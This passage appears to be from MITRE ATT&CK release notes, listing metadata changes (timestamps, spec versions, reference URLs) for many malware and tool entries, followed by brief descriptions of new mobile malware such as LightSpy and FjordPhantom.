| external_references[4]['description'] | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017. | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html | https://web.archive.org/web/20210126065851/https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html |
[S1089] SharpDisco
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-26 20:19:38.859000+00:00 | 2025-04-16 20:37:57.878000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0546] SharpStage
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-18 23:48:44.783000+00:00 | 2025-04-16 20:37:55.445000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0444] ShimRat
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-29 03:39:40.754000+00:00 | 2025-04-16 20:38:09.372000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0445] ShimRatReporter
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-27 22:39:28.701000+00:00 | 2025-04-16 20:38:50.090000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0589] Sibot
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-27 19:54:34.154000+00:00 | 2025-04-16 20:38:25.040000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0610] SideTwist
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-13 13:53:26.301000+00:00 | 2025-04-16 20:38:38.737000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0623] Siloscape
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 13:42:10.432000+00:00 | 2025-04-16 20:38:07.079000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1035] Small Sieve
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-14 15:24:24.129000+00:00 | 2025-04-16 20:38:45.865000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0273] Socksbot
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:14:59.190000+00:00 | 2025-04-16 20:38:40.498000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0627] SodaMaster
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-11 15:50:25.945000+00:00 | 2025-04-16 20:38:24.073000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0615] SombRAT
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-05 16:33:54.170000+00:00 | 2025-04-16 20:38:04+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0516] SoreFang
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-06 16:10:42.422000+00:00 | 2025-04-16 20:38:40.031000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0543] Spark
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-18 23:49:01.615000+00:00 | 2025-04-16 20:37:52.059000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0646] SpicyOmelette
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 16:42:45.608000+00:00 | 2025-04-16 20:38:10.394000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0058] SslMM
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-18 15:53:57.549000+00:00 | 2025-04-16 20:38:01.128000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0188] Starloader
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-18 16:01:37.852000+00:00 | 2025-04-16 20:38:24.530000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0142] StreamEx
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:15:56.762000+00:00 | 2025-04-16 20:38:22.967000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1034] StrifeWater
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-11 18:34:04.838000+00:00 | 2025-04-16 20:38:45.234000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0603] Stuxnet
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-10 23:46:32.577000+00:00 | 2025-01-02 19:40:26.678000+00:00 |
| external_references[3]['url'] | https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf | https://web-assets.esetstatic.com/wls/2012/11/Stuxnet_Under_the_Microscope.pdf |
| external_references[4]['description'] | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf | https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en |
[S0018] Sykipot
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-13 22:58:34.210000+00:00 | 2025-04-16 20:38:14.881000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0242] SynAck
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-09-08 19:22:44.438000+00:00 | 2025-04-16 20:37:52.360000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0060] Sys10
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-18 23:13:31.404000+00:00 | 2025-04-16 20:38:20.019000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0096] Systeminfo
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-07 13:03:30.781000+00:00 | 2025-04-16 20:38:53.231000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0098] T9000
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-31 12:40:49.213000+00:00 | 2025-04-16 20:38:20.867000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0586] TAINTEDSCRIBE
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-26 15:52:00.433000+00:00 | 2025-04-16 20:38:19.869000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0164] TDTESS
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:18:53.335000+00:00 | 2025-04-16 20:37:55.276000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0560] TEARDROP
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-27 19:55:35.688000+00:00 | 2025-04-16 20:38:01.954000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0146] TEXTMATE
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-20 20:06:44.708000+00:00 | 2025-04-16 20:38:06.918000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0436] TSCookie
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-15 11:32:25.171000+00:00 | 2025-04-16 20:38:18.117000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0199] TURNEDUP
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-02-09 15:25:33.116000+00:00 | 2025-04-16 20:38:38.086000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0467] TajMahal
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-15 21:19:30.717000+00:00 | 2025-04-16 20:38:31.332000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1011] Tarrask
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-18 15:53:30.609000+00:00 | 2025-04-16 20:38:25.204000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0595] ThiefQuest
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-16 15:01:37.957000+00:00 | 2025-04-16 20:38:16.679000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0668] TinyTurla
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-26 20:20:44.580000+00:00 | 2025-04-16 20:38:00.312000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0004] TinyZBot
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-22 18:37:22.180000+00:00 | 2025-04-16 20:38:33.790000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0671] Tomiris
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-15 13:14:08.071000+00:00 | 2025-04-16 20:38:01.801000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0682] TrailBlazer
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-27 19:56:40.741000+00:00 | 2025-04-16 20:38:33.457000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0094] Trojan.Karagany
Current version: 3.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-19 14:57:44.862000+00:00 | 2025-04-16 20:38:20.519000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0001] Trojan.Mebromi
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:22:55.430000+00:00 | 2025-04-16 20:38:34.746000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0178] Truvasys
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-18 16:10:02.987000+00:00 | 2025-04-16 20:38:14.507000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0647] Turian
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 13:19:48.020000+00:00 | 2025-04-16 20:38:02.104000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0116] UACMe
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:49.934000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0275] UPPERCUT
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:24:27.229000+00:00 | 2025-04-16 20:38:44.933000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0452] USBferry
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-16 15:52:25.167000+00:00 | 2025-04-16 20:38:17.950000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0221] Umbreon
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-07-01 18:32:47.285000+00:00 | 2025-04-16 20:38:03.511000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0130] Unknown Logger
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:25:14.290000+00:00 | 2025-04-16 20:38:29.897000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0442] VBShower
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-12 20:56:07.174000+00:00 | 2025-04-16 20:38:21.823000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0476] Valak
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-24 21:42:31.959000+00:00 | 2025-04-16 20:38:30.200000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0636] VaporRage
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-04 15:46:36.800000+00:00 | 2025-04-16 20:38:24.732000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0207] Vasport
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-01-06 19:32:28.278000+00:00 | 2024-11-17 19:55:07.593000+00:00 |
| external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0155] WINDSHIELD
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:25.359000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0219] WINERACK
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-04 21:37:24.766000+00:00 | 2024-11-17 15:01:33.388000+00:00 |
| external_references[1]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
[S0366] WannaCry
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-08 22:20:20.868000+00:00 | 2024-12-09 02:29:13.859000+00:00 |
| external_references[8]['description'] | Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019. | Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved December 8, 2024. |
| external_references[8]['url'] | https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/ | https://web.archive.org/web/20230522041200/https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/ |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0515] WellMail
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-09 15:38:41.755000+00:00 | 2025-04-16 20:38:24.228000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0514] WellMess
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-03-22 18:45:19.504000+00:00 | 2025-04-16 20:38:02.903000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0206] Wiarp
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-01-06 19:32:28.378000+00:00 | 2024-11-17 19:55:07.588000+00:00 |
| external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0059] WinMM
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:27:57.226000+00:00 | 2025-04-16 20:37:58.498000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0466] WindTail
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-10 20:39:43.747000+00:00 | 2024-11-17 14:15:51.851000+00:00 |
| external_references[1]['description'] | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020. | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf | https://www.scribd.com/document/661837258/WINDSHIFT-summit-archive-1554718868 |
[S0176] Wingbird
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:29:08.243000+00:00 | 2025-04-16 20:38:29.211000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0041] Wiper
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:28.028000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0161] XAgentOSX
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:30:21.733000+00:00 | 2025-04-16 20:38:10.547000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0117] XTunnel
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-21 00:40:57.275000+00:00 | 2025-04-16 20:38:17.007000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0341] Xbash
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-23 20:41:28.496000+00:00 | 2025-04-16 20:38:15.191000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0086] ZLib
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-30 20:52:00.462000+00:00 | 2025-04-16 20:37:56.750000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0251] Zebrocy
Current version: 3.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-23 19:45:36.003000+00:00 | 2025-04-16 20:38:28.500000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0027] Zeroaccess
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:08.895000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0412] ZxShell
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-23 15:27:10.501000+00:00 | 2025-04-16 20:38:36.169000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0202] adbupd
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:33:31.623000+00:00 | 2025-04-16 20:37:56.265000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0110] at
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-22 20:56:56.049000+00:00 | 2025-04-16 20:38:49.779000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0471] build_downer
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-24 17:50:33.499000+00:00 | 2025-04-16 20:38:36.962000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1043] ccf32
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-10 19:47:44.529000+00:00 | 2025-04-16 20:38:28.343000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0106] cmd
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-13 20:24:11.194000+00:00 | 2025-04-16 20:38:55.702000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0472] down_new
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-24 01:27:32.659000+00:00 | 2025-04-16 20:38:21.345000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0105] dsquery
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-01-04 18:56:27.812000+00:00 | 2025-04-16 20:38:51.407000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0008] gsecdump
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-22 20:55:32.937000+00:00 | 2024-11-17 23:49:27.288000+00:00 |
| external_references[1]['description'] | TrueSec. (n.d.). gsecdump v2.0b5. Retrieved September 29, 2015. | TrueSec. (n.d.). gsecdump v2.0b5. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 | https://web.archive.org/web/20140328102838/https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0071] hcdLoader
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:36:37.734000+00:00 | 2025-04-16 20:38:26.900000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0068] httpclient
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:37:13.552000+00:00 | 2025-04-16 20:38:40.829000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0278] iKitten
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:37:55.343000+00:00 | 2025-04-16 20:38:00.655000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0101] ifconfig
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:51.252000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0100] ipconfig
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-12 21:28:49.335000+00:00 | 2025-04-16 20:38:50.417000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1048] macOS.OSAMiner
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-19 21:01:46.587000+00:00 | 2025-04-16 20:37:59.825000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0175] meek
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-02-09 23:00:38.683000+00:00 | 2025-04-16 20:38:52.775000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0102] nbtstat
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:55.076000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0385] njRAT
Current version: 1.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 00:33:37.539000+00:00 | 2024-11-17 16:13:48.723000+00:00 |
| external_references[3]['description'] | Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019. | Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html | https://web.archive.org/web/20200302085808/https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html |
[S0067] pngdowner
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:39:05.662000+00:00 | 2025-04-16 20:38:20.185000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0006] pwdump
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-08-13 20:12:50.895000+00:00 | 2025-04-16 20:38:54.480000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0103] route
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-06 15:27:00.668000+00:00 | 2025-04-16 20:38:55.853000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0111] schtasks
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-20 20:04:22.896000+00:00 | 2025-04-16 20:38:56.004000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0227] spwebmember
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-03-29 19:54:46.007000+00:00 | 2025-04-16 20:38:51.100000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0225] sqlmap
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:54.328000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0653] xCaon
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-16 02:20:16.562000+00:00 | 2025-04-16 20:37:58.030000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0123] xCmd
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:51.879000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0248] yty
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-28 21:45:32.149000+00:00 | 2025-04-16 20:37:53.646000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0350] zwShell
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-22 00:38:34.857000+00:00 | 2025-04-16 20:38:08.735000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
mobile-attack
New Software
[S1214] Android/SpyAgent
Current version: 1.0
Description:
Android/SpyAgent is a variant of spyware in the MoqHao phishing campaign primarily targeting Korean and Japanese users.(Citation: McAfee MoqHao 2019) Fake security applications were used to target Japanese users, while fake police applications were used to target Korean users. Both fake applications have common C2 commands and share the same crash report key on a cloud service.(Citation: McAfee MoqHao 2019)
[S1215] Binary Validator
Current version: 1.0
Description:
Binary Validator is a Mach-O binary file used during Operation Triangulation.(Citation: SecureList OpTriangulation 23Oct2023) Binary Validator first collects information about the device, such as the device's phone number and a list of installed applications, before the deployment of the TriangleDB implant. After the actions are completed and the data is collected, Binary Validator encrypts and sends the data to the C2 server, and in turn, the C2 server sends the TriangleDB implant.
[S1208] FjordPhantom
Current version: 1.0
Description:
FjordPhantom is a malicious Android application first discovered in September 2024 with targets in Southeast Asia, specifically Indonesia, Thailand, and Vietnam. FjordPhantom was distributed through email and messaging applications. Once installed, the application launches a virtualization solution to steal important information, such as bank accounts, and to manipulate the user interface. The malicious activity from the virtualization solution runs alongside legitimate banking applications.(Citation: Promon FjordPhantom Oct2024)
[S1185] LightSpy
Current version: 1.0
Description:
First observed in 2018, LightSpy is a modular malware family that initially targeted iOS devices in Southern Asia before expanding to Android and macOS platforms. It consists of a downloader, a main executable that manages network communications, and functionality-specific modules, typically implemented as .dylib files (iOS, macOS) or .apk files (Android). LightSpy can collect VoIP call recordings, SMS messages, and credential stores, which are then exfiltrated to a command and control (C2) server.(Citation: MelikovBlackBerry LightSpy 2024)
[S1195] SpyC23
Current version: 1.0
Description:
